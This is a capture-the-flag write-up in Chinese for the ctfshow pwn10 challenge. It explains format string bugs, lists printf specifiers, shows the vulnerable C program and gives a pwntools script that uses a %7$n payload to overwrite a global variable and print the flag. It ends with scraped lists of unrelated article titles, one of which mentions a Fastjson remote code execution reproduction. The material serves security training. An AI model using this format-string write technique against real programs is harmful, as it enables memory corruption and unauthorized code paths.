格式化字符串漏洞

具体什么是格式化字符串请大家参考如下文章

https://wiki.x10sec.org/pwn/fmtstr/fmtstr_intro/

printf函数格式化输出符号及详细说明

原文地址:https://blog.csdn.net/xiexievv/article/details/6831194

%a  浮点数、十六进制数字和p-记数法(c99

%A  浮点数、十六进制数字和p-记法(c99)

%c  一个字符(char)

%C  一个ISO宽字符

%d  有符号十进制整数(int)(%ld、%Ld:长整型数据(long),%hd:输出短整形。) 

%e  浮点数、e-记数法

%E  浮点数、E-记数法

%f  单精度浮点数(默认float)、十进制记数法(%.nf  这里n表示精确到小数位后n位.十进制计数)

%g  根据数值不同自动选择%f或%e.

%G  根据数值不同自动选择%f或%e.

%i  有符号十进制数(与%d相同)

%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置

%o  无符号八进制整数

%p  指针

%s  对应字符串char*(%s = %hs = %hS 输出 窄字符)

%S  对应宽字符串WCAHR*(%ws = %S 输出宽字符串)

%u  无符号十进制整数(unsigned int)

%x  使用十六进制数字0xf的无符号十六进制整数 

%X  使用十六进制数字0xf的无符号十六进制整数

%%  打印一个百分号

%I64d 用于INT64 或者 long long

%I64u 用于UINT64 或者 unsigned long long

%I64x 用于64位16进制数据

%m.n : m指域宽,即对应的输出项在输出设备上所占的字符数。n指精度。用于说明输出的实型数的小数位数。为指定n时,隐含的精度为n=6位。

l 对整型指long型,对实型指double型。h用于将整型的格式字符修正为short型。

题目源码

#include <stdio.h>

int num = 0;

int main() {

	setvbuf(stdin, 0, 1, 0);

	setvbuf(stdout, 0, 2, 0);

	char str[100];

	printf("try pwn me?\n");

	scanf("%s", str);

	printf(str);

	if (num == 16)

	{

		system("cat flag");

	}

	else

	{

		printf("You may need to keep learning!");

	}

	return 0;

}

解题

分析

定义了一个全局变量num

str存在溢出

只有一个格式化字符串漏洞

利用漏洞更改num的数值

最终达到输出flag的目的

测试偏移量

可以得到偏移量为7

编写脚本

from pwn import *

p = remote('124.156.121.112',28053)

#p = process("./pwn10")

num_addr = 0x0804A030

payload = p32(num_addr)+"aaaaaaaaaaaa%7$n"

p.sendline(payload)

p.interactive()

测试



ctfshow—pwn10的更多相关文章

  1. ctfshow之Web入门刷题记(从89开始,持续更新)

    0x01Web89-99PHP特性payload Web89 include("flag.php"); highlight_file(__FILE__); if(isset($_G ...

  2. 关于CTFshow中Web入门42-54

    0x00前记 ​ 终于把学校上学期的期末考试考完了,刚好复习的时候跟着群里的师傅写了ctfshow上Web入门的42-54的题目,其中有很多的坑,但是收获也是很多的,这里做一下总结吧!给自己挖了很多的 ...

  3. c通过ctfshow学习php反序列化

    web254 web255 web256 web257 web258 web259 web260 web262 web263 web264 web265 web266 web254 error_rep ...

  4. ctfshow——web_AK赛

    签到_观己 从题目描述中没发现什么有用的信息 发现文件包含 尝试使用PHP伪协议执行命令,发现无法执行 尝试使用远程文件包含,发现也未开启 尝试使用日志注入 记录了UA值,抓包写入一句话木马 使用蚁剑 ...

  5. ctfshow WEB入门 信息收集 1-20

    web1 题目:开发注释未及时删除 查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题 ...

  6. ctfshow萌新 web1-7

    ctfshow萌新 web1 1.手动注入.需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 2.找到?id=" "处有回显 ...

  7. ctfshow web2 web3

    ctfshow web2 1.手动注入题.先用万能密码admin' or 1=1%23,有回显 2.union select注入,2处有回显 3.依次查找数据库.表.字段 得到flag ctfshow ...

  8. ctfshow web入门部分题目 (更新中)

    CTFSHOW(WEB) web入门 给她 1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sq ...

  9. CTFshow——funnyrsa1的wp理解

    题目如下: 题目分析: 拿到题,发现给的e不常规,p1和p2相等,有两个不同n,两个不同c和两个不同e.给定两个密文的情况下,通常需要找到两者之间存在的关系,"合并"密文求解才能得 ...

随机推荐

  1. Fastjson 1.2.47 远程命令执行漏洞复现

    前言 这个漏洞出来有一段时间了,有人一直复现不成功来问我,就自己复现了下,顺便简单记录下这个漏洞原理,以便后面回忆. 复现过程 网上已经有很多文章了,这里就不在写了.主要记录一下复现过程中遇到的问题 ...

  2. 百度网站统计和CNZZ网站统计对比

    一,前言 百度统计和cnzz统计是目前市面上比较流行的两种web统计工具,接下来将对两个统计工具做初步的体验测评 百度网站统计相关介绍:全球最大的中文网站流量分析平台,帮助企业收集网站访问数据,提供流 ...

  3. IDEA创建maven项目很慢的问题解决方式

    问题现象:刚转IDEA开发,发现创建maven项目,非常慢. 解决方式: 构建maven项目添加参数,要不然非常慢,会卡住-DarchetypeCatalog=internal 自动导入包,codin ...

  4. PHP字符串你不知道的事

    PHP常见的定义字符串的方式有那些? 1.单引号 在单引号中,任何特殊字符都会按原样输出[除\.\'将会被转义输出],不是什么都不解析的,这是很多人的误解 echo 'this is a var!'. ...

  5. C#数据结构-线索化二叉树

    为什么线索化二叉树? 对于二叉树的遍历,我们知道每个节点的前驱与后继,但是这是建立在遍历的基础上,否则我们只知道后续的左右子树.现在我们充分利用二叉树左右子树的空节点,分别指向当前节点的前驱.后继,便 ...

  6. Leetcode——练习

    平时没事刷刷Leetcode,还办了个年会员.为了自己150刀.为了自己的大脑投资,从不差钱儿.刷刷题能练习coding,此外看一些别人的优秀的答案,能增长见解.大家共同努力,共勉. 十.Google ...

  7. [日常摸鱼][poj2777]Count Color-线段树

    辣鸡会考考完啦哈哈哈哈 题意:一块板分成$L$块,每次给一段连续的块染色或者询问一段有几种颜色,颜色的范围$\leq 30$ 我记得我好像做过一个类似的二维染色的问题-不过那个用树状数组直接过掉了- ...

  8. 多任务-python实现-Thread的基本使用(2.1.1)

    @ 目录 1.多任务的概念 2.线程 1.多任务的概念 "多任务工作"指的是当前很普遍的工作状态,一个人同时处理多件事情,比如以下这个常见的画面:写一会报告,刷一下网页,查一下资料 ...

  9. kali linux没有ip解决办法

    故障情况 今天打开kali202001复测环境,发现自启动ssh竟然连不上. 上到kali主机使用命令:ifconfig 查看发现没有ethh0网卡显示,看来是kal获取不到ip地址导致的 继续查看发 ...

  10. BST和DST简单的matlab程序(图的广度和深度遍历)

    图的广度和深度遍历,具体内容教材有 clc;clear all;close all; %初始化邻接压缩表compressTable=[1 2;1 3;1 4;2 4;2 5;3 6;4 6;4 7]; ...